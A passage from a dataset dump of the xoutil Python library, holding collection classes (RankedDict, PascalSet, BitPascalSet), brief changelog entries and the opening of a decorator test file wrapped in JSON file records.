`~list.pop`:meth:.\n\n \"\"\"\n if self:\n if index is None or index is True:\n index = -1\n key = self._ranks.pop(index)\n return key, super().pop(key)\n else:\n raise KeyError(\"popitem(): dictionary is empty\")\n\n def __sizeof__(self):\n \"\"\"D.__sizeof__() -> size of D in memory, in bytes.\n\n .. note:: Why ``sys.getsizeof(obj)`` doesn't return the same result as\n ``obj.__sizeof__()``?\n\n \"\"\"\n return super().__sizeof__() + self._ranks.__sizeof__()\n\n def keys(self):\n \"\"\"D.keys() -> an object providing a view on D's keys.\"\"\"\n return self.__iter__()\n\n def values(self):\n \"\"\"D.values() -> an object providing a view on D's values.\"\"\"\n for key in self:\n yield self[key]\n\n def items(self):\n \"\"\"D.items() -> an object providing a view on D's items.\"\"\"\n for key in self:\n yield (key, self[key])\n\n def __eq__(self, other):\n \"\"\"rd.__eq__(y) <==> rd==y.\n\n Comparison to another `RankedDict`:class: instance is order-sensitive\n while comparison to a regular mapping is order-insensitive.\n\n \"\"\"\n res = super().__eq__(other)\n if res:\n if isinstance(other, RankedDict):\n return self._ranks == other._ranks\n elif isinstance(other, OrderedDict):\n return self._ranks == list(other)\n else:\n return True\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def pop(self, key, *args):\n \"\"\"rd.pop(k[,d]) -> v\n\n Remove specified key and return the corresponding value.\n\n If key is not found, d is returned if given, otherwise KeyError is\n raised.\n\n \"\"\"\n from xotl.tools.params import check_count\n\n count = len(args)\n check_count(count + 1, 1, 2, caller=\"pop\")\n res = super().pop(key, Unset)\n if res is Unset:\n if count == 1:\n return args[0]\n else:\n raise KeyError(key)\n else:\n self._ranks.remove(key)\n return res\n\n def setdefault(self, key, default=None):\n \"\"\"D.setdefault(k[,d]) -> D.get(k,d), also set D[k]=d if k not in D\"\"\"\n if key in self:\n return self[key]\n else:\n self[key] = default\n return default\n\n @recursive_repr()\n def __repr__(self):\n \"\"\"x.__repr__() <==> repr(x)\"\"\"\n aux = \", \".join(\"({!r}, {!r})\".format(k, self[k]) for k in self)\n if aux:\n aux = \"[{}]\".format(aux)\n return \"{}({})\".format(type(self).__name__, aux)\n\n def __reduce__(self):\n \"\"\"Return state information for pickling.\"\"\"\n cls = type(self)\n inst_dict = vars(self).copy()\n for k in vars(cls()):\n inst_dict.pop(k, None)\n return cls, (), inst_dict or None, None, iter(self.items())\n\n def copy(self):\n \"\"\"D.copy() -> a shallow copy of D.\"\"\"\n return type(self)(self)\n\n @classmethod\n def fromkeys(cls, iterable, value=None):\n \"\"\"RD.fromkeys(S[, v]) -> New ranked dictionary with keys from S.\n\n If not specified, the value defaults to None.\n\n \"\"\"\n return cls((key, value) for key in iterable)\n\n\nclass OrderedSmartDict(SmartDictMixin, OrderedDict):\n \"\"\"A combination of the `OrderedDict` with the `SmartDictMixin`.\n\n .. warning:: Initializing with kwargs does not ensure any initial ordering,\n since Python's keyword dict is not ordered. Use a list/tuple\n of pairs instead.\n\n \"\"\"\n\n def __init__(*args, **kwds):\n \"\"\"Initialize an ordered dictionary.\n\n The signature is the same as regular dictionaries, but keyword\n arguments are not recommended because their insertion order is\n arbitrary.\n\n \"\"\"\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n super().__init__()\n self.update(*args, **kwds)\n\n\nclass MetaSet(type):\n \"\"\"Allow syntax sugar creating sets.\n\n This is pythonic syntax (stop limit is never included), for example::\n\n >>> from xotl.tools.future.collections import PascalSet as srange\n >>> [i for i in srange[1:4, 15, 20:23]]\n [1, 2, 3, 15, 20, 21, 22, 23]\n\n \"\"\"\n\n def __getitem__(cls, ranges):\n return cls(*ranges) if isinstance(ranges, tuple) else cls(ranges)\n\n\nclass PascalSet(metaclass=MetaSet):\n \"\"\"Collection of unique integer elements (implemented with intervals).\n\n ::\n\n PascalSet(*others) -> new set object\n\n .. versionadded:: 1.7.1\n\n \"\"\"\n\n __slots__ = (\"_items\",)\n\n def __init__(self, *others):\n \"\"\"Initialize self.\n\n :param others: Any number of integer or collection of integers that\n will be the set members.\n\n \"\"\"\n self._items = [] # a list of list of two elements\n self.update(*others)\n\n def __str__(self):\n def aux(s, e):\n if s == e:\n return str(s)\n elif s + 1 == e:\n return \"%s, %s\" % (s, e)\n else:\n return \"%s..%s\" % (s, e)\n\n l = self._items\n ranges = ((l[i], l[i + 1]) for i in range(0, len(l), 2))\n return str(\"{%s}\" % \", \".join((aux(s, e) for (s, e) in ranges)))\n\n def __repr__(self):\n cls = type(self)\n cname = cls.__name__\n return str(\"%s([%s])\" % (cname, \", \".join((str(i) for i in self))))\n\n def __iter__(self):\n l = self._items\n i, count = 0, len(l)\n while i < count:\n s, e = l[i], l[i + 1]\n while s <= e:\n yield s\n s += 1\n i += 2\n\n def __len__(self):\n res = 0\n l = self._items\n i, count = 0, len(l)\n while i < count:\n res += l[i + 1] - l[i] + 1\n i += 2\n return res\n\n def __nonzero__(self):\n return bool(self._items)\n\n __bool__ = __nonzero__\n\n def __contains__(self, other):\n \"\"\"True if set has an element ``other``, else False.\"\"\"\n return isinstance(other, int) and self._search(other)[0]\n\n def __hash__(self):\n \"\"\"Compute the hash value of a set.\"\"\"\n return Set._hash(self)\n\n def __eq__(self, other):\n \"\"\"Python 2 and 3 have several differences in operator definitions.\n\n For example::\n\n >>> from xotl.tools.future.collections import PascalSet\n >>> s1 = PascalSet[0:10]\n >>> assert s1 == set(s1) # OK (True) in 2 and 3\n >>> assert set(s1) == s1 # OK in 3, fails in 2\n\n \"\"\"\n if isinstance(other, Set):\n ls, lo = len(self), len(other)\n if ls == lo:\n if isinstance(other, PascalSet):\n return self._items == other._items\n else:\n return self.count(other) == ls\n else:\n return False\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __gt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issuperset(other) and len(self) > len(other)\n else:\n return bool(self._items)\n else:\n return NotImplemented\n\n def __ge__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issuperset(other)\n else:\n return bool(self._items)\n else:\n return NotImplemented\n\n def __lt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issubset(other) and len(self) < len(other)\n else:\n return not self._items\n else:\n return NotImplemented\n\n def __le__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issubset(other)\n else:\n return not self._items\n else:\n return NotImplemented\n\n def __sub__(self, other):\n if isinstance(other, Set):\n return self.difference(other)\n else:\n return NotImplemented\n\n def __isub__(self, other):\n if isinstance(other, Set):\n self.difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rsub__(self, other):\n if isinstance(other, Set):\n return other - type(other)(self)\n else:\n return NotImplemented\n\n def __and__(self, other):\n if isinstance(other, Set):\n return self.intersection(other)\n else:\n return NotImplemented\n\n def __iand__(self, other):\n if isinstance(other, Set):\n self.intersection_update(other)\n return self\n else:\n return NotImplemented\n\n def __rand__(self, other):\n if isinstance(other, Set):\n return other & type(other)(self)\n else:\n return NotImplemented\n\n def __or__(self, other):\n if isinstance(other, Set):\n return self.union(other)\n else:\n return NotImplemented\n\n def __ior__(self, other):\n if isinstance(other, Set):\n self.update(other)\n return self\n else:\n return NotImplemented\n\n def __ror__(self, other):\n if isinstance(other, Set):\n return other | type(other)(self)\n else:\n return NotImplemented\n\n def __xor__(self, other):\n if isinstance(other, Set):\n return self.symmetric_difference(other)\n else:\n return NotImplemented\n\n def __ixor__(self, other):\n if isinstance(other, Set):\n self.symmetric_difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rxor__(self, other):\n if isinstance(other, Set):\n return other ^ type(other)(self)\n else:\n return NotImplemented\n\n def count(self, other):\n \"\"\"Number of occurrences of any member of other in this set.\n\n If other is an integer, return 1 if present, 0 if not.\n\n \"\"\"\n if isinstance(other, int):\n return 1 if other in self else 0\n else:\n return sum((i in self for i in other), 0)\n\n def add(self, other):\n \"\"\"Add an element to a set.\n\n This has no effect if the element is already present.\n\n \"\"\"\n self._insert(other)\n\n def union(self, *others):\n \"\"\"Return the union of sets as a new set.\n\n (i.e. all elements that are in either set.)\n\n \"\"\"\n res = self.copy()\n res.update(*others)\n return res\n\n def update(self, *others):\n \"\"\"Update a set with the union of itself and others.\"\"\"\n for other in others:\n if isinstance(other, PascalSet):\n l = other._items\n if self._items:\n count = len(l)\n i = 0\n while i < count:\n self._insert(l[i], l[i + 1])\n i += 2\n else:\n self._items = l[:]\n elif isinstance(other, int):\n self._insert(other)\n elif isinstance(other, Iterable):\n for i in other:\n self._insert(i)\n elif isinstance(other, slice):\n start, stop, step = other.start, other.stop, other.step\n if step is None:\n step = 1\n if step in (1, -1):\n stop -= step\n if step == -1:\n start, stop = stop, start\n self._insert(start, stop)\n else:\n for i in range(start, stop, step):\n self._insert(i)\n else:\n raise self._invalid_value(other)\n\n def intersection(self, *others):\n \"\"\"Return the intersection of two or more sets as a new set.\n\n (i.e. elements that are common to all of the sets.)\n\n \"\"\"\n res = self.copy()\n res.intersection_update(*others)\n return res\n\n def intersection_update(self, *others):\n \"\"\"Update a set with the intersection of itself and another.\"\"\"\n l = self._items\n oi, count = 0, len(others)\n while l and oi < count:\n other = others[oi]\n if not isinstance(other, PascalSet):\n # safe mode for intersection\n other = PascalSet(i for i in other if isinstance(i, int))\n o = other._items\n if o:\n sl, el = l[0], l[-1]\n so, eo = o[0], o[-1]\n if sl < so:\n self._remove(sl, so - 1)\n if eo < el:\n self._remove(eo + 1, el)\n i = 2\n while l and i < len(o):\n s, e = o[i - 1] + 1, o[i] - 1\n if s <= e:\n self._remove(s, e)\n i += 2\n else:\n del l[:]\n oi += 1\n\n def difference(self, *others):\n \"\"\"Return the difference of two or more sets as a new set.\n\n (i.e. all elements that are in this set but not the others.)\n\n \"\"\"\n res = self.copy()\n res.difference_update(*others)\n return res\n\n def difference_update(self, *others):\n \"\"\"Remove all elements of another set from this set.\"\"\"\n for other in others:\n if isinstance(other, PascalSet):\n l = other._items\n count = len(l)\n i = 0\n while i < count:\n self._remove(l[i], l[i + 1])\n i += 2\n else:\n for i in other:\n if isinstance(i, int):\n self._remove(i)\n\n def symmetric_difference(self, other):\n \"\"\"Return the symmetric difference of two sets as a new set.\n\n (i.e. all elements that are in exactly one of the sets.)\n\n \"\"\"\n res = self.copy()\n res.symmetric_difference_update(other)\n return res\n\n def symmetric_difference_update(self, other):\n \"Update a set with the symmetric difference of itself and another.\"\n if not isinstance(other, PascalSet):\n other = PascalSet(other)\n if self:\n if other:\n # TODO: Implement more efficiently\n aux = other - self\n self -= other\n self |= aux\n else:\n self._items = other._items[:]\n\n def discard(self, other):\n \"\"\"Remove an element from a set if it is a member.\n\n If the element is not a member, do nothing.\n\n \"\"\"\n self._remove(other)\n\n def remove(self, other):\n \"\"\"Remove an element from a set; it must be a member.\n\n If the element is not a member, raise a KeyError.\n\n \"\"\"\n if other in self:\n self._remove(other)\n else:\n raise KeyError('\"%s\" is not a member!' % other)\n\n def pop(self):\n \"\"\"Remove and return an arbitrary set element.\n\n Raises KeyError if the set is empty.\n\n \"\"\"\n l = self._items\n if l:\n res = l[0]\n if l[0] < l[1]:\n l[0] += 1\n else:\n del l[0:2]\n return res\n else:\n raise KeyError(\"pop from an empty set!\")\n\n def clear(self):\n \"\"\"Remove all elements from this set.\"\"\"\n self._items = []\n\n def copy(self):\n \"\"\"Return a shallow copy of a set.\"\"\"\n return type(self)(self)\n\n def isdisjoint(self, other):\n \"\"\"Return True if two sets have a null intersection.\"\"\"\n if isinstance(other, PascalSet):\n if self and other:\n l, o = self._items, other._items\n i, lcount, ocount = 0, len(l), len(o)\n maybe = True\n while maybe and i < lcount:\n found, idx = other._search(l[i])\n if idx == ocount: # exhausted\n # assert not found\n i = lcount\n elif found or l[i + 1] >= o[idx]:\n maybe = False\n else:\n i += 2\n return maybe\n else:\n return True\n else:\n return not any(i in self for i in other)\n\n def issubset(self, other):\n \"\"\"Report whether another set contains this set.\"\"\"\n ls = len(self)\n if isinstance(other, PascalSet):\n if self:\n if ls > len(other): # Fast check for obvious cases\n return False\n else:\n l, o = self._items, other._items\n i, lcount = 0, len(l)\n maybe = True\n while maybe and i < lcount:\n found, idx = other._search(l[i])\n if found and l[i + 1] <= o[idx + 1]:\n i += 2\n else:\n maybe = False\n return maybe\n else:\n return True\n elif isinstance(other, Sized) and ls > len(other):\n # Fast check for obvious cases\n return False\n elif isinstance(other, Container):\n aux = next((i for i in self if i not in other), Unset)\n return aux is Unset\n else:\n # Generator cases\n from operator import add\n from functools import reduce\n\n lo = reduce(add, (i in self for i in other), 0)\n return lo == ls\n\n def issuperset(self, other):\n \"\"\"Report whether this set contains another set.\"\"\"\n ls = len(self)\n if isinstance(other, PascalSet):\n if other:\n if ls < len(other): # Fast check for obvious cases\n return False\n else:\n l, o = self._items, other._items\n i, ocount = 0, len(o)\n maybe = True\n while maybe and i < ocount:\n found, idx = self._search(o[i])\n if found and o[i + 1] <= l[idx + 1]:\n i += 2\n else:\n maybe = False\n return maybe\n else:\n return True\n elif isinstance(other, Sized) and ls < len(other):\n # Fast check for obvious cases\n return False\n else:\n aux = next((i for i in other if i not in self), Unset)\n return aux is Unset\n\n def _search(self, other):\n \"\"\"Search the pair where ``other`` is placed.\n\n Return a duple :``(if found or not, index)``.\n\n \"\"\"\n if isinstance(other, int):\n l = self._items\n start, end = 0, len(l)\n res, pivot = False, 2 * (end // 4)\n while not res and start < end:\n s, e = l[pivot], l[pivot + 1]\n if other < s:\n end = pivot\n elif other > e:\n start = pivot + 2\n else:\n res = True\n pivot = start + 2 * ((end - start) // 4)\n return res, pivot\n else:\n raise self._invalid_value(other)\n\n def _insert(self, start, end=None):\n \"\"\"Insert an interval of integers.\"\"\"\n if not end:\n end = start\n assert start <= end\n l = self._items\n count = len(l)\n found, idx = self._search(start)\n if not found:\n if idx > 0 and start == l[idx - 1] + 1:\n found = True\n idx -= 2\n l[idx + 1] = start\n if idx < count - 2 and end == l[idx + 2] - 1:\n end = l[idx + 3]\n elif idx < count and end >= l[idx] - 1:\n found = True\n l[idx] = start\n if found:\n while end > l[idx + 1]:\n if idx < count - 2 and end >= l[idx + 2] - 1:\n if end <= l[idx + 3]:\n l[idx + 1] = l[idx + 3]\n del l[idx + 2 : idx + 4]\n count -= 2\n else:\n l[idx + 1] = end\n else:\n if idx < count:\n l.insert(idx, start)\n l.insert(idx + 1, end)\n else:\n l.extend((start, end))\n count += 2\n\n def _remove(self, start, end=None):\n \"\"\"Remove an interval of integers.\"\"\"\n if not end:\n end = start\n assert start <= end\n l = self._items\n sfound, sidx = self._search(start)\n efound, eidx = self._search(end)\n if sfound and efound and sidx == eidx:\n first = l[sidx] < start\n last = l[eidx + 1] > end\n if first and last:\n l.insert(eidx + 1, end + 1)\n l.insert(sidx + 1, start - 1)\n elif first:\n l[sidx + 1] = start - 1\n elif last:\n l[eidx] = end + 1\n else:\n del l[sidx : eidx + 2]\n else:\n if sfound and l[sidx] < start:\n l[sidx + 1] = start - 1\n sidx += 2\n if efound:\n if l[eidx + 1] > end:\n l[eidx] = end + 1\n else:\n eidx += 2\n if sidx < eidx:\n del l[sidx:eidx]\n\n def _invalid_value(self, value):\n cls_name = type(self).__name__\n vname = type(value).__name__\n msg = (\n 'Unsupported type for value \"%s\" of type \"%s\" for a \"%s\", '\n \"must be an integer!\"\n )\n return TypeError(msg % (value, vname, cls_name))\n\n @classmethod\n def _prime_numbers_until(cls, limit):\n \"\"\"This is totally a funny test method.\"\"\"\n res = cls[2:limit]\n for i in range(2, limit // 2 + 1):\n if i in res:\n aux = i + i\n while aux < limit:\n if aux in res:\n res.remove(aux)\n aux += i\n return res\n\n\nMutableSet.register(PascalSet)\n\n\nclass BitPascalSet(metaclass=MetaSet):\n \"\"\"Collection of unique integer elements (implemented with bit-wise sets).\n\n ::\n\n BitPascalSet(*others) -> new bit-set object\n\n .. versionadded:: 1.7.1\n\n \"\"\"\n\n __slots__ = (\"_items\",)\n _bit_length = 62 # How many values are stored in each item\n\n def __init__(self, *others):\n \"\"\"Initialize self.\n\n :param others: Any number of integer or collection of integers that\n will be the set members.\n\n In this case `_items` is a dictionary with keys containing number\n division seeds and values bit-wise integers (each bit is the division\n modulus position).\n\n \"\"\"\n self._items = {}\n self.update(*others)\n\n def __str__(self):\n if self:\n return str(PascalSet(self))\n else:\n cname = type(self).__name__\n return str(\"%s([])\") % cname\n\n def __repr__(self):\n cname = type(self).__name__\n res = str(\", \").join(str(i) for i in self)\n return str(\"%s([%s])\") % (cname, res)\n\n def __iter__(self):\n bl = self._bit_length\n sm = self._items\n for k in sorted(sm):\n v = sm[k]\n base = k * bl\n i = 0\n ref = 1\n while i < bl:\n if ref & v:\n yield base + i\n ref <<= 1\n i += 1\n\n def __len__(self):\n return sum((1 for i in self), 0)\n\n def __nonzero__(self):\n return bool(self._items)\n\n __bool__ = __nonzero__\n\n def __contains__(self, other):\n \"\"\"True if this bit-set has the element ``other``, else False.\"\"\"\n res = self._search(other)\n if res:\n k, ref, v = res\n return bool(v & (1 << ref))\n else:\n return False\n\n def __hash__(self):\n \"\"\"Compute the hash value of a set.\"\"\"\n return Set._hash(self)\n\n def __eq__(self, other):\n \"\"\"Python 2 and 3 have several differences in operator definitions.\n\n For example::\n\n >>> from xotl.tools.future.collections import BitPascalSet\n >>> s1 = BitPascalSet[0:10]\n >>> assert s1 == set(s1) # OK (True) in 2 and 3\n >>> assert set(s1) == s1 # OK in 3, fails in 2\n\n \"\"\"\n if isinstance(other, Set):\n if isinstance(other, BitPascalSet):\n return self._items == other._items\n else:\n ls, lo = len(self), len(other)\n return ls == lo == self.count(other)\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __gt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issuperset(other) and len(self) > len(other)\n else:\n return bool(self._items)\n else:\n return NotImplemented\n\n def __ge__(self, other):\n if isinstance(other, Set):\n return self.issuperset(other) if other else bool(self._items)\n else:\n return NotImplemented\n\n def __lt__(self, other):\n if isinstance(other, Set):\n if other:\n return self.issubset(other) and len(self) < len(other)\n else:\n return not self._items\n else:\n return NotImplemented\n\n def __le__(self, other):\n if isinstance(other, Set):\n return self.issubset(other) if other else not self._items\n else:\n return NotImplemented\n\n def __sub__(self, other):\n if isinstance(other, Set):\n return self.difference(other)\n else:\n return NotImplemented\n\n def __isub__(self, other):\n if isinstance(other, Set):\n self.difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rsub__(self, other):\n if isinstance(other, Set):\n return other - type(other)(self)\n else:\n return NotImplemented\n\n def __and__(self, other):\n if isinstance(other, Set):\n return self.intersection(other)\n else:\n return NotImplemented\n\n def __iand__(self, other):\n if isinstance(other, Set):\n self.intersection_update(other)\n return self\n else:\n return NotImplemented\n\n def __rand__(self, other):\n if isinstance(other, Set):\n return other & type(other)(self)\n else:\n return NotImplemented\n\n def __or__(self, other):\n if isinstance(other, Set):\n return self.union(other)\n else:\n return NotImplemented\n\n def __ior__(self, other):\n if isinstance(other, Set):\n self.update(other)\n return self\n else:\n return NotImplemented\n\n def __ror__(self, other):\n if isinstance(other, Set):\n return other | type(other)(self)\n else:\n return NotImplemented\n\n def __xor__(self, other):\n if isinstance(other, Set):\n return self.symmetric_difference(other)\n else:\n return NotImplemented\n\n def __ixor__(self, other):\n if isinstance(other, Set):\n self.symmetric_difference_update(other)\n return self\n else:\n return NotImplemented\n\n def __rxor__(self, other):\n if isinstance(other, Set):\n return other ^ type(other)(self)\n else:\n return NotImplemented\n\n def count(self, other):\n \"\"\"Number of occurrences of any member of other in this set.\n\n If other is an integer, return 1 if present, 0 if not.\n\n \"\"\"\n if isinstance(other, int):\n return 1 if other in self else 0\n else:\n return sum((i in self for i in other), 0)\n\n def add(self, other):\n \"\"\"Add an element to a bit-set.\n\n This has no effect if the element is already present.\n\n \"\"\"\n self._insert(other)\n\n def union(self, *others):\n \"\"\"Return the union of bit-sets as a new set.\n\n (i.e. all elements that are in either set.)\n\n \"\"\"\n res = self.copy()\n res.update(*others)\n return res\n\n def update(self, *others):\n \"\"\"Update a bit-set with the union of itself and others.\"\"\"\n for other in others:\n if isinstance(other, BitPascalSet):\n sm = self._items\n om = other._items\n for k, v in safe_dict_iter(om).items():\n if k in sm:\n sm[k] |= v\n else:\n sm[k] = v\n elif isinstance(other, int):\n self._insert(other)\n elif isinstance(other, Iterable):\n for i in other:\n self._insert(i)\n elif isinstance(other, slice):\n start, stop, step = other.start, other.stop, other.step\n if step is None:\n step = 1\n for i in range(start, stop, step):\n self._insert(i)\n else:\n raise self._invalid_value(other)\n\n def intersection(self, *others):\n \"\"\"Return the intersection of two or more bit-sets as a new set.\n\n (i.e. elements that are common to all of the sets.)\n\n \"\"\"\n res = self.copy()\n res.intersection_update(*others)\n return res\n\n def intersection_update(self, *others):\n \"\"\"Update a bit-set with the intersection of itself and another.\"\"\"\n sm = self._items\n oi, count = 0, len(others)\n while sm and oi < count:\n other = others[oi]\n if not isinstance(other, BitPascalSet):\n # safe mode for intersection\n other = PascalSet(i for i in other if isinstance(i, int))\n om = other._items\n for k, v in safe_dict_iter(sm).items():\n v &= om.get(k, 0)\n if v:\n sm[k] = v\n else:\n del sm[k]\n oi += 1\n\n def difference(self, *others):\n \"\"\"Return the difference of two or more bit-sets as a new set.\n\n (i.e. all elements that are in this set but not the others.)\n\n \"\"\"\n res = self.copy()\n res.difference_update(*others)\n return res\n\n def difference_update(self, *others):\n \"\"\"Remove all elements of another bit-set from this set.\"\"\"\n for other in others:\n if isinstance(other, BitPascalSet):\n sm = self._items\n om = other._items\n for k, v in safe_dict_iter(om).items():\n if k in sm:\n v = sm[k] & ~v\n if v:\n sm[k] = v\n else:\n del sm[k]\n else:\n for i in other:\n if isinstance(i, int):\n self._remove(i)\n\n def symmetric_difference(self, other):\n \"\"\"Return the symmetric difference of two bit-sets as a new set.\n\n (i.e. all elements that are in exactly one of the sets.)\n\n \"\"\"\n res = self.copy()\n res.symmetric_difference_update(other)\n return res\n\n def symmetric_difference_update(self, other):\n \"Update a bit-set with the symmetric difference of itself and another.\"\n if not isinstance(other, BitPascalSet):\n other = BitPascalSet(other)\n if self:\n if other:\n # TODO: Implement more efficiently\n aux = other - self\n self -= other\n self |= aux\n else:\n self._items = other._items[:]\n\n def discard(self, other):\n \"\"\"Remove an element from a bit-set if it is a member.\n\n If the element is not a member, do nothing.\n\n \"\"\"\n self._remove(other)\n\n def remove(self, other):\n \"\"\"Remove an element from a bit-set; it must be a member.\n\n If the element is not a member, raise a KeyError.\n\n \"\"\"\n self._remove(other, fail=True)\n\n def pop(self):\n \"\"\"Remove and return an arbitrary bit-set element.\n\n Raises KeyError if the set is empty.\n\n \"\"\"\n sm = self._items\n if sm:\n bl = self._bit_length\n k, v = next(sm.items())\n assert v\n base = k * bl\n i = 0\n ref = 1\n res = None\n while res is None:\n if ref & v:\n res = base + i\n else:\n ref <<= 1\n i += 1\n v &= ~ref\n if v:\n sm[k] = v\n else:\n del sm[k]\n return res\n else:\n raise KeyError(\"pop from an empty set!\")\n\n def clear(self):\n \"\"\"Remove all elements from this bit-set.\"\"\"\n self._items = {}\n\n def copy(self):\n \"\"\"Return a shallow copy of a set.\"\"\"\n return type(self)(self)\n\n def isdisjoint(self, other):\n \"\"\"Return True if two bit-sets have a null intersection.\"\"\"\n if isinstance(other, BitPascalSet):\n sm, om = self._items, other._items\n if sm and om:\n return all(sm.get(k, 0) & v == 0 for k, v in om.items())\n else:\n return True\n else:\n return not any(i in self for i in other)\n\n def issubset(self, other):\n \"\"\"Report whether another set contains this bit-set.\"\"\"\n if isinstance(other, BitPascalSet):\n sm, om = self._items, other._items\n if sm:\n return all(om.get(k, 0) & v == v for k, v in sm.items())\n else:\n return True\n elif isinstance(other, Container):\n return not any(i not in other for i in self)\n else:\n # Generator cases\n return sum((i in self for i in other), 0) == len(self)\n\n def issuperset(self, other):\n \"\"\"Report whether this bit set contains another set.\"\"\"\n if isinstance(other, BitPascalSet):\n sm, om = self._items, other._items\n if om:\n return all(sm.get(k, 0) & v == v for k, v in om.items())\n else:\n return True\n else:\n return not any(i not in self for i in other)\n\n def _search(self, other):\n \"\"\"Search the bit-wise value where ``other`` could be placed.\n\n Return a duple :``(seed, bits to shift left)``.\n\n \"\"\"\n if isinstance(other, int):\n sm = self._items\n bl = self._bit_length\n k, ref = divmod(other, bl)\n return k, ref, sm.get(k, 0)\n else:\n return None\n\n def _insert(self, other):\n \"\"\"Add a member in this bit-set.\"\"\"\n aux = self._search(other)\n if aux:\n k, ref, v = aux\n self._items[k] = v | (1 << ref)\n else:\n raise self._invalid_value(other)\n\n def _remove(self, other, fail=False):\n \"\"\"Remove an interval of integers from this bit-set.\"\"\"\n aux = self._search(other)\n ok = False\n if aux:\n k, ref, v = aux\n if v:\n aux = v & ~(1 << ref)\n if v != aux:\n ok = True\n sm = self._items\n if aux:\n sm[k] = aux\n else:\n del sm[k]\n if not ok and fail:\n raise KeyError('\"%s\" is not a member!' % other)\n\n def _invalid_value(self, value):\n cls_name = type(self).__name__\n vname = type(value).__name__\n msg = (\n 'Unsupported type for value \"%s\" of type \"%s\" for a \"%s\", '\n \"must be an integer!\"\n )\n return TypeError(msg % (value, vname, cls_name))\n\n @classmethod\n def _prime_numbers_until(cls, limit):\n \"\"\"This is totally a funny test method.\"\"\"\n res = cls[2:limit]\n for i in range(2, limit // 2 + 1):\n if i in res:\n aux = i + i\n while aux < limit:\n if aux in res:\n res.remove(aux)\n aux += i\n return res\n\n\nMutableSet.register(BitPascalSet)\n\n\n# Smart Tools\n\n\ndef pair(arg):\n \"\"\"Check if `arg` is a pair (two elements tuple or list).\"\"\"\n return arg if isinstance(arg, (tuple, list)) and len(arg) == 2 else None\n\n\ndef smart_iter_items(*args, **kwds):\n \"\"\"Unify iteration over (key, value) pairs.\n\n If a pair of pairs is found, e.g. ``[(1, 2), (3, 4)]``, instead of\n yielding one pair (the outermost), inner two pairs takes precedence.\n\n \"\"\"\n for arg in args:\n if isinstance(arg, Mapping):\n for key in arg:\n yield key, arg[key]\n elif hasattr(arg, \"keys\") and hasattr(arg, \"__getitem__\"):\n # Custom mappings\n for key in arg.keys():\n yield key, arg[key]\n elif pair(arg) and not (pair(arg[0]) and pair(arg[1])):\n yield arg\n else:\n for item in arg:\n if pair(item):\n yield item\n else:\n msg = \"'{}' object '{}' is not a pair\"\n raise TypeError(msg.format(type(item).__name__, item))\n for key in kwds:\n yield key, kwds[key]\n\n\n# get rid of unused global variables\ndel deprecated, recursive_repr\n" }, { "alpha_fraction": 0.7307692170143127, "alphanum_fraction": 0.7307692170143127, "avg_line_length": 77, "blob_id": "70d75db1b23b1aa6f7cfea731dc4d04d5442c486", "content_id": "780c16f7e2d90c36d495b59fd913d2b3d7529fd5", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 78, "license_type": "permissive", "max_line_length": 77, "num_lines": 1, "path": "/docs/source/history/_changes-1.6.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug in `xoutil.fs.concatfiles`:func:\\ : There were leaked opened files.\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 44.14285659790039, "blob_id": "63f00f41c53fa55ba97d217491f099f520b30a14", "content_id": "d74cee1374c0525fcefee23ebf23d78fce605d12", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 316, "license_type": "permissive", "max_line_length": 74, "num_lines": 7, "path": "/docs/source/history/_changes-1.6.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the `strict` argument to `xoutil.records.datetime_reader`:func:.\n\n- You may now install ``xoutil[extra]`` so that not required but useful\n packages are installed when xoutil is installed.\n\n For now this only includes ``python-dateutil`` that allows the change in\n `~xoutil.records.datetime_reader`:func:.\n" }, { "alpha_fraction": 0.5378372669219971, "alphanum_fraction": 0.5474885106086731, "avg_line_length": 25.660818099975586, "blob_id": "7ba58241ede495046bb3f57effd2457ceadd44ae", "content_id": "0c19f71eb391fc4d046da195ad1e7497c2778dd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4560, "license_type": "no_license", "max_line_length": 78, "num_lines": 171, "path": "/tests/test_decorators.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nfrom xoutil.decorator import assignment_operator\nfrom xoutil.decorator.meta import decorator\n\n\nclass TestAssignable(unittest.TestCase):\n def test_inline_expression(self):\n @assignment_operator()\n def test(name, *args):\n return name * (len(args) + 1)\n\n self.assertEqual(\"aaa\", test(\"a\", 1, 2))\n\n def test_assignment(self):\n @assignment_operator()\n def test(name, *args):\n return name * (len(args) + 1)\n\n b = test(1, 2, 4)\n self.assertEqual(\"bbbb\", b)\n\n def test_regression_inline(self):\n @assignment_operator(maybe_inline=True)\n def test(name, *args):\n if name:\n return name * (len(args) + 1)\n else:\n return None\n\n self.assertIs(None, test(\"a\", 1, 2))\n\n def test_regression_on_block(self):\n @assignment_operator(maybe_inline=True)\n def union(name, *args):\n return (name,) + args\n\n for which in (union(1, 2),):\n self.assertEqual((None, 1, 2), which)\n\n def test_argsless_decorator(self):\n @decorator\n def log(func, fmt=\"Calling function %s\"):\n def inner(*args, **kwargs):\n print(fmt % func.__name__)\n return func(*args, **kwargs)\n\n return inner\n\n @log\n def 